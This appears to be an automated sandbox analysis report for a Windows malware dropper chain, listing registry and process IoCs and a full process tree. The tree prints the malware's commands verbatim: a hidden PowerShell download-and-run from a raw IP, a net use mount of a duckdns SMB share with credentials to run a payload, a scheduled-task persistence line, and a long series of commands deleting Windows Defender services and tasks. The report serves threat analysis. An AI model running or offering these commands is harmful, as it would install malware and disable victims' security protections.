Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	MeshAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	MeshAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000_Classes\Local Settings	rapes.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3420	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3976	powershell.exe
3976	powershell.exe
5060	TempMUTMGHCGLSPKRDFEGTG1HZVQXET1VQWT.EXE
5060	TempMUTMGHCGLSPKRDFEGTG1HZVQXET1VQWT.EXE
4804	rapes.exe
4804	rapes.exe
5556	powershell.exe
5556	powershell.exe
5556	powershell.exe
4708	powershell.exe
4708	powershell.exe
4708	powershell.exe
4776	powershell.exe
4776	powershell.exe
4776	powershell.exe
3064	powershell.exe
3064	powershell.exe
3064	powershell.exe
956	powershell.exe
956	powershell.exe
956	powershell.exe
4608	rapes.exe
4608	rapes.exe
5400	e08fa14c46.exe
5400	e08fa14c46.exe
5400	e08fa14c46.exe
5400	e08fa14c46.exe
5400	e08fa14c46.exe
5400	e08fa14c46.exe
336	powershell.exe
336	powershell.exe
336	powershell.exe
5128	powershell.exe
5128	powershell.exe
5128	powershell.exe
5256	Passwords.com
5256	Passwords.com
5256	Passwords.com
5256	Passwords.com
5256	Passwords.com
5256	Passwords.com
4088	a2b268f8c5.exe
4088	a2b268f8c5.exe
5152	powershell.exe
5152	powershell.exe
5152	powershell.exe
5256	Passwords.com
5256	Passwords.com
5256	Passwords.com
5256	Passwords.com
3836	powershell.exe
3836	powershell.exe
3836	powershell.exe
1152	MSBuild.exe
1152	MSBuild.exe
1152	MSBuild.exe
1152	MSBuild.exe
2300	powershell.exe
2300	powershell.exe
2300	powershell.exe
10892	powershell.exe
10892	powershell.exe
10892	powershell.exe
11648	rapes.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
656	Process not Found
656	Process not Found

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
4200	UZPt0hR.exe
4200	UZPt0hR.exe
4200	UZPt0hR.exe

Suspicious use of AdjustPrivilegeToken 18 IoCs

description	pid	Process
Token: SeDebugPrivilege	3976	powershell.exe
Token: SeDebugPrivilege	5556	powershell.exe
Token: SeDebugPrivilege	4708	powershell.exe
Token: SeDebugPrivilege	4776	powershell.exe
Token: SeDebugPrivilege	3064	powershell.exe
Token: SeDebugPrivilege	956	powershell.exe
Token: SeDebugPrivilege	5172	7q8Wm5h.exe
Token: SeDebugPrivilege	336	powershell.exe
Token: SeDebugPrivilege	5128	powershell.exe
Token: SeDebugPrivilege	752	tasklist.exe
Token: SeDebugPrivilege	1244	tasklist.exe
Token: SeDebugPrivilege	5152	powershell.exe
Token: SeDebugPrivilege	3836	powershell.exe
Token: SeDebugPrivilege	2300	powershell.exe
Token: SeDebugPrivilege	10892	powershell.exe
Token: SeDebugPrivilege	11852	powershell.exe
Token: SeDebugPrivilege	4532	FrameworkName.exe
Token: SeDebugPrivilege	10592	RegAsm.exe

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
2464	random.exe
2464	random.exe
2464	random.exe
5256	Passwords.com
5256	Passwords.com
5256	Passwords.com

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
2464	random.exe
2464	random.exe
2464	random.exe
5256	Passwords.com
5256	Passwords.com
5256	Passwords.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2464 wrote to memory of 6108	2464	random.exe	86
PID 2464 wrote to memory of 6108	2464	random.exe	86
PID 2464 wrote to memory of 6108	2464	random.exe	86
PID 2464 wrote to memory of 5980	2464	random.exe	87
PID 2464 wrote to memory of 5980	2464	random.exe	87
PID 2464 wrote to memory of 5980	2464	random.exe	87
PID 6108 wrote to memory of 3420	6108	cmd.exe	90
PID 6108 wrote to memory of 3420	6108	cmd.exe	90
PID 6108 wrote to memory of 3420	6108	cmd.exe	90
PID 5980 wrote to memory of 3976	5980	mshta.exe	93
PID 5980 wrote to memory of 3976	5980	mshta.exe	93
PID 5980 wrote to memory of 3976	5980	mshta.exe	93
PID 3976 wrote to memory of 5060	3976	powershell.exe	97
PID 3976 wrote to memory of 5060	3976	powershell.exe	97
PID 3976 wrote to memory of 5060	3976	powershell.exe	97
PID 5060 wrote to memory of 4804	5060	TempMUTMGHCGLSPKRDFEGTG1HZVQXET1VQWT.EXE	100
PID 5060 wrote to memory of 4804	5060	TempMUTMGHCGLSPKRDFEGTG1HZVQXET1VQWT.EXE	100
PID 5060 wrote to memory of 4804	5060	TempMUTMGHCGLSPKRDFEGTG1HZVQXET1VQWT.EXE	100
PID 4804 wrote to memory of 5228	4804	rapes.exe	104
PID 4804 wrote to memory of 5228	4804	rapes.exe	104
PID 4804 wrote to memory of 5228	4804	rapes.exe	104
PID 5228 wrote to memory of 5556	5228	cmd.exe	106
PID 5228 wrote to memory of 5556	5228	cmd.exe	106
PID 5228 wrote to memory of 5556	5228	cmd.exe	106
PID 5556 wrote to memory of 6140	5556	powershell.exe	107
PID 5556 wrote to memory of 6140	5556	powershell.exe	107
PID 5556 wrote to memory of 6140	5556	powershell.exe	107
PID 6140 wrote to memory of 4888	6140	cmd.exe	109
PID 6140 wrote to memory of 4888	6140	cmd.exe	109
PID 6140 wrote to memory of 4888	6140	cmd.exe	109
PID 4804 wrote to memory of 2676	4804	rapes.exe	110
PID 4804 wrote to memory of 2676	4804	rapes.exe	110
PID 4804 wrote to memory of 2676	4804	rapes.exe	110
PID 2676 wrote to memory of 2480	2676	apple.exe	111
PID 2676 wrote to memory of 2480	2676	apple.exe	111
PID 2676 wrote to memory of 2480	2676	apple.exe	111
PID 2480 wrote to memory of 3064	2480	262.exe	113
PID 2480 wrote to memory of 3064	2480	262.exe	113
PID 3064 wrote to memory of 4008	3064	cmd.exe	115
PID 3064 wrote to memory of 4008	3064	cmd.exe	115
PID 3064 wrote to memory of 4008	3064	cmd.exe	115
PID 4008 wrote to memory of 1700	4008	262.exe	116
PID 4008 wrote to memory of 1700	4008	262.exe	116
PID 1700 wrote to memory of 1600	1700	cmd.exe	118
PID 1700 wrote to memory of 1600	1700	cmd.exe	118
PID 1700 wrote to memory of 3416	1700	cmd.exe	119
PID 1700 wrote to memory of 3416	1700	cmd.exe	119
PID 1700 wrote to memory of 4648	1700	cmd.exe	120
PID 1700 wrote to memory of 4648	1700	cmd.exe	120
PID 1700 wrote to memory of 3424	1700	cmd.exe	122
PID 1700 wrote to memory of 3424	1700	cmd.exe	122
PID 1700 wrote to memory of 6000	1700	cmd.exe	123
PID 1700 wrote to memory of 6000	1700	cmd.exe	123
PID 1700 wrote to memory of 5224	1700	cmd.exe	124
PID 1700 wrote to memory of 5224	1700	cmd.exe	124
PID 1700 wrote to memory of 712	1700	cmd.exe	125
PID 1700 wrote to memory of 712	1700	cmd.exe	125
PID 1700 wrote to memory of 4332	1700	cmd.exe	126
PID 1700 wrote to memory of 4332	1700	cmd.exe	126
PID 1700 wrote to memory of 4660	1700	cmd.exe	127
PID 1700 wrote to memory of 4660	1700	cmd.exe	127
PID 1700 wrote to memory of 956	1700	cmd.exe	128
PID 1700 wrote to memory of 956	1700	cmd.exe	128
PID 1700 wrote to memory of 3564	1700	cmd.exe	129

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\random.exe
"C:\Users\Admin\AppData\Local\Temp\random.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2464
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn UIJgqmaVZva /tr "mshta C:\Users\Admin\AppData\Local\Temp\QVHJVZhvG.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:6108
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn UIJgqmaVZva /tr "mshta C:\Users\Admin\AppData\Local\Temp\QVHJVZhvG.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3420
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\QVHJVZhvG.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5980
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MUTMGHCGLSPKRDFEGTG1HZVQXET1VQWT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3976
  - - C:\Users\Admin\AppData\Local\TempMUTMGHCGLSPKRDFEGTG1HZVQXET1VQWT.EXE
      "C:\Users\Admin\AppData\Local\TempMUTMGHCGLSPKRDFEGTG1HZVQXET1VQWT.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:5060
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4804
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10449261121\pfJNmVW.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process cmd -ArgumentList '/c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall' -windowstyle hidden -Verb RunAs; # Cloudflare verification (Ray ID: 90b0e54eb8bdaasd84)
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5556
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:6140
        
        C:\Windows\SysWOW64\net.exe
        
        net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234!
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:4888
        
        \??\UNC\aaso12.duckdns.org\shear\s.exe
        
        \\aaso12.duckdns.org\shear\s -fullinstall
        9⤵
        Sets service image path in registry
        Drops file in Program Files directory
        
        PID:2740
      - C:\Users\Admin\AppData\Local\Temp\10449770101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10449770101\apple.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2676
        
        C:\Users\Admin\AppData\Local\Temp\262.exe
        
        "C:\Users\Admin\AppData\Local\Temp\262.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2480
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A9CD.tmp\A9CE.tmp\A9CF.bat C:\Users\Admin\AppData\Local\Temp\262.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:3064
        
        C:\Users\Admin\AppData\Local\Temp\262.exe
        
        "C:\Users\Admin\AppData\Local\Temp\262.exe" go
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4008
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AB15.tmp\AB16.tmp\AB17.bat C:\Users\Admin\AppData\Local\Temp\262.exe go"
        10⤵
        Drops file in Program Files directory
        Suspicious use of WriteProcessMemory
        
        PID:1700
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        
        PID:1600
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:3416
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:4648
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:3424
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:6000
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5224
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:712
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:4332
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:4660
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        
        PID:956
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:3564
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:2524
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:1608
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:5756
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:3732
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        
        PID:724
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        11⤵
        Launches sc.exe
        
        PID:2328
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        11⤵
        Launches sc.exe
        
        PID:5732
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        
        PID:4568
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:4696
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:4572
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        Modifies security service
        
        PID:1464
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:2464
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:3600
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        
        PID:4188
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:220
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:4788
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        
        PID:5420
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:3952
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:2252
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        
        PID:212
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:3220
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:1016
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        
        PID:2432
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:2440
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:5980
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:3188
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:2904
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:4232
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:4880
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:4840
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:4876
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:4900
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:5008
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:5676
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        
        PID:3452
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:2012
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:3740
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        
        PID:2784
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:676
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:5072
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:2340
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:1768
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:1096
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        
        PID:3940
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:4148
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:5032
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:5712
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        
        PID:5796
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:2668
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        11⤵
        Launches sc.exe
        
        PID:5088
      - C:\Users\Admin\AppData\Local\Temp\10450130101\RLPhvHg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10450130101\RLPhvHg.exe"
        6⤵
        Executes dropped EXE
        
        PID:2244
      - C:\Users\Admin\AppData\Local\Temp\10450190101\7q8Wm5h.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10450190101\7q8Wm5h.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5172
      - C:\Users\Admin\AppData\Local\Temp\10450200101\e08fa14c46.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10450200101\e08fa14c46.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
